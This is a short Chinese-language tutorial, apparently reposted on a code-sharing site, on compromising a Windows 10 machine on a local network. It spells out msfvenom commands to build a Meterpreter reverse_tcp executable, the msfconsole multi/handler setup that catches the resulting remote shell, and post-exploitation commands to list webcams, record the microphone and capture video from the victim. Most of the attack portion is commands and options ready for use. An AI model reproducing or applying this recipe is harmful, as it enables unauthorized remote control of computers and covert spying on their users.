内网渗透之入侵win10(入门)


条件:两台试验机在同一网段,目标机关闭杀毒软件

步骤:msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx lport=xxx -f exe -o /root/xxx.exe

      -p windows/meterpreter/reverse_tcp --添加载荷(反向远程控制程序)

      lhost=xxx       --主机ip

      lport=xxx        --监听端口(自定义)

      -f exe        --文件格式为exe格式

      -o /root/payload.exe --生成的exe文件存放目录

    生成的exe文件手动添加到电脑上并运行,在msfconsole上便可以看到信息  

   启动metasploit工具(主控端)

      msfconsole --启动主控端

      use exploit /multi/handler --使用handler作为主动端

      set payload windows/meterpreter/reverse_tcp --设置payload为反向远程控制程序名称

      set lhost --设置监听ip

      set lport --设置监听端口

      exploit --等待被控端启动程序即可

    

    相关基础命令:    

    webcam_list   --列出目标系统上所有网络摄像头列表,按数量编号

      -h:显示帮助。

      -i :要使用的网络摄像头的索引号。

      -p :JPEG图像文件路径。默认为HOME / [随机乱码名字] .jpeg

      -q:JPEG图像质量,默认为“50”

      -v:自动查看JPEG图像,默认为“true”

    record_mic --录音

      -h:显示帮助。

      -d :记录的秒数,默认为1秒

      -F :wav文件路径。默认为HOME / [随机乱码名字] .wav

      -p :自动播放捕获的音频,默认为“true”

    run webcam --录像

      -h:显示帮助横幅。

      -d :循环延迟间隔(以毫秒为单位),默认为1000

      -f:只抓一帧

      -g:发送到GUI而不是写入文件

      -i :默认情况下使用的网络摄像头的索引1

      -l:默认情况下保持循环捕获(无用)

      -p :默认情况下,文件夹映像的路径将保存在当前工作目录中

      -q :JPEG质量,默认为“50”

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM